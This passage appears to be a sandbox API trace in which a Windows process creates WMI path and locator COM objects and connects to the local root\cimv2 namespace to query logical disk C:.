CoTaskMemFree (pv=0xbed438) [0206.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0206.107] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e970 | out: ppv=0x949e970*=0xb51e34) returned 0x0 [0206.107] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e968 | out: pAptType=0x949e968*=1) returned 0x0 [0206.107] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e96c | out: ppvObject=0x949e96c*=0x0) returned 0x80004002 [0206.107] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.109] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2d8 | out: ppv=0x949e2d8*=0x60272e0) returned 0x0 [0206.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4f0 | out: ppvObject=0x949e4f0*=0x0) returned 0x80004002 [0206.109] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e504 | out: ppvObject=0x949e504*=0x6031190) returned 0x0 [0206.121] WbemDefPath:IUnknown:Release (This=0x60272e0) returned 0x0 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e124 | out: ppvObject=0x949e124*=0x6031190) returned 0x0 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0e0 | out: ppvObject=0x949e0e0*=0x0) returned 0x80004002 [0206.121] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da3c | out: ppvObject=0x949da3c*=0x0) returned 0x80004002 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9ec | out: ppvObject=0x949d9ec*=0x0) returned 0x80004002 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9f8 | out: ppvObject=0x949d9f8*=0xbe23c0) returned 0x0 [0206.121] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe23c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da00 | out: pCid=0x949da00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.121] WbemDefPath:IUnknown:Release (This=0xbe23c0) returned 0x3 [0206.121] CoGetContextToken (in: pToken=0x949da58 | out: pToken=0x949da58) returned 0x0 [0206.121] CoGetContextToken (in: pToken=0x949de60 | out: pToken=0x949de60) returned 0x0 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949def0 | out: ppvObject=0x949def0*=0x0) returned 0x80004002 [0206.121] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0206.121] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0206.121] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0206.121] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0206.121] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x949e818*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x6031190) returned 0x0 [0206.121] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0206.122] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0206.122] WbemDefPath:IWbemPath:SetText (This=0x6031190, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e998*=0x0, pszText=0x0 | out: puBuffLength=0x949e998*=0x20, pszText=0x0) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=2, puBuffLength=0x949e998*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e998*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031190, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x949e91c | out: puCount=0x949e91c*=0x0) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e908 | out: puCount=0x949e908*=0x2) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0x0, pszText=0x0 | out: puBuffLength=0x949e904*=0xf, pszText=0x0) returned 0x0 [0206.122] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e904*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.122] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8b8 | out: ppv=0x949e8b8*=0xb51e34) returned 0x0 [0206.122] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8b0 | out: pAptType=0x949e8b0*=1) returned 0x0 [0206.122] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x0) returned 0x80004002 [0206.122] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.123] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e220 | out: ppv=0x949e220*=0x6027350) returned 0x0 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027350, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e438 | out: ppvObject=0x949e438*=0x0) returned 0x80004002 [0206.123] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027350, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e44c | out: ppvObject=0x949e44c*=0x6030d30) returned 0x0 [0206.123] WbemDefPath:IUnknown:Release (This=0x6027350) returned 0x0 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e06c | out: ppvObject=0x949e06c*=0x6030d30) returned 0x0 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e028 | out: ppvObject=0x949e028*=0x0) returned 0x80004002 [0206.123] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d984 | out: ppvObject=0x949d984*=0x0) returned 0x80004002 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d934 | out: ppvObject=0x949d934*=0x0) returned 0x80004002 [0206.123] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d940 | out: ppvObject=0x949d940*=0xbe2510) returned 0x0 [0206.123] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d948 | out: pCid=0x949d948*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.123] WbemDefPath:IUnknown:Release (This=0xbe2510) returned 0x3 [0206.123] CoGetContextToken (in: pToken=0x949d9a0 | out: pToken=0x949d9a0) returned 0x0 [0206.123] CoGetContextToken (in: pToken=0x949dda8 | out: pToken=0x949dda8) returned 0x0 [0206.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de38 | out: ppvObject=0x949de38*=0x0) returned 0x80004002 [0206.124] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0206.124] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x1 [0206.124] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0206.124] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0206.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030d30, riid=0x949e760*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e75c | out: ppvObject=0x949e75c*=0x6030d30) returned 0x0 [0206.124] WbemDefPath:IUnknown:AddRef (This=0x6030d30) returned 0x3 [0206.124] WbemDefPath:IUnknown:Release (This=0x6030d30) returned 0x2 [0206.124] WbemDefPath:IWbemPath:SetText (This=0x6030d30, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.124] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e8e0 | out: puCount=0x949e8e0*=0x2) returned 0x0 [0206.124] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x949e8dc*=0x0, pszText=0x0 | out: puBuffLength=0x949e8dc*=0xf, pszText=0x0) returned 0x0 [0206.124] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=4, puBuffLength=0x949e8dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.124] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8e0 | out: ppv=0x949e8e0*=0xb51e34) returned 0x0 [0206.124] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8d8 | out: pAptType=0x949e8d8*=1) returned 0x0 [0206.124] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8dc | out: ppvObject=0x949e8dc*=0x0) returned 0x80004002 [0206.124] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.125] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e500 | out: ppv=0x949e500*=0x6024a28) returned 0x0 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6024a28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e718 | out: ppvObject=0x949e718*=0x0) returned 0x80004002 [0206.125] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024a28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e72c | out: ppvObject=0x949e72c*=0x6027360) returned 0x0 [0206.125] WbemLocator:IUnknown:Release (This=0x6024a28) returned 0x0 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e34c | out: ppvObject=0x949e34c*=0x6027360) returned 0x0 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e308 | out: ppvObject=0x949e308*=0x0) returned 0x80004002 [0206.125] WbemLocator:IUnknown:AddRef (This=0x6027360) returned 0x3 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc64 | out: ppvObject=0x949dc64*=0x0) returned 0x80004002 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc14 | out: ppvObject=0x949dc14*=0x0) returned 0x80004002 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc20 | out: ppvObject=0x949dc20*=0x0) returned 0x80004002 [0206.125] CoGetContextToken (in: pToken=0x949dc80 | out: pToken=0x949dc80) returned 0x0 [0206.125] CoGetContextToken (in: pToken=0x949e088 | out: pToken=0x949e088) returned 0x0 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0206.125] WbemLocator:IUnknown:Release (This=0x6027360) returned 0x2 [0206.125] WbemLocator:IUnknown:Release (This=0x6027360) returned 0x1 [0206.125] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0206.125] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0206.125] WbemLocator:IUnknown:QueryInterface (in: This=0x6027360, riid=0x949e728*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e724 | out: ppvObject=0x949e724*=0x6027360) returned 0x0 [0206.125] WbemLocator:IUnknown:AddRef (This=0x6027360) returned 0x3 [0206.125] WbemLocator:IUnknown:Release (This=0x6027360) returned 0x2 [0206.125] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030d30, puCount=0x949e8bc | out: puCount=0x949e8bc*=0x2) returned 0x0 [0206.125] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=8, puBuffLength=0x949e8b8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8b8*=0xf, pszText=0x0) returned 0x0 [0206.126] WbemDefPath:IWbemPath:GetText (in: This=0x6030d30, lFlags=8, puBuffLength=0x949e8b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.126] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e794 | out: ppv=0x949e794*=0x6027370) returned 0x0 [0206.126] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027370, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e828 | out: ppNamespace=0x949e828*=0x60334d4) returned 0x0 [0206.500] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6c4 | out: ppvObject=0x949e6c4*=0x66b46bc) returned 0x0 [0206.500] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b46bc, pProxy=0x60334d4, pAuthnSvc=0x949e714, pAuthzSvc=0x949e710, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c, pImpLevel=0x949e6fc, pAuthInfo=0x949e700, pCapabilites=0x949e704 | out: pAuthnSvc=0x949e714*=0xa, pAuthzSvc=0x949e710*=0x0, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c*=0x6, pImpLevel=0x949e6fc*=0x2, pAuthInfo=0x949e700, pCapabilites=0x949e704*=0x1) returned 0x0 [0206.500] WbemLocator:IUnknown:Release (This=0x66b46bc) returned 0x1 [0206.501] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b8 | out: ppvObject=0x949e6b8*=0x66b46dc) returned 0x0 [0206.501] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b4 | out: ppvObject=0x949e6b4*=0x66b46bc) returned 0x0 [0206.501] WbemLocator:IClientSecurity:SetBlanket (This=0x66b46bc, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.501] WbemLocator:IUnknown:Release (This=0x66b46bc) returned 0x2 [0206.501] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x1 [0206.501] CoTaskMemFree (pv=0xbd4a38) [0206.501] WbemLocator:IUnknown:Release (This=0x6027370) returned 0x0 [0206.501] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b4 | out: ppvObject=0x949e2b4*=0x66b46dc) returned 0x0 [0206.501] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e270 | out: ppvObject=0x949e270*=0x0) returned 0x80004002 [0206.513] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e08c | out: ppvObject=0x949e08c*=0x0) returned 0x80004002 [0206.516] WbemLocator:IUnknown:AddRef (This=0x66b46dc) returned 0x3 [0206.516] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dbcc | out: ppvObject=0x949dbcc*=0x0) returned 0x80004002 [0206.517] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0206.520] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949db88 | out: ppvObject=0x949db88*=0x66b463c) returned 0x0 [0206.520] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b463c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949db90 | out: pCid=0x949db90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.520] WbemLocator:IUnknown:Release (This=0x66b463c) returned 0x3 [0206.520] CoGetContextToken (in: pToken=0x949dbe8 | out: pToken=0x949dbe8) returned 0x0 [0206.520] CoGetContextToken (in: pToken=0x949dff0 | out: pToken=0x949dff0) returned 0x0 [0206.520] WbemLocator:IUnknown:QueryInterface (in: This=0x66b46dc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e080 | out: ppvObject=0x949e080*=0x66b46c4) returned 0x0 [0206.520] WbemLocator:IRpcOptions:Query (in: 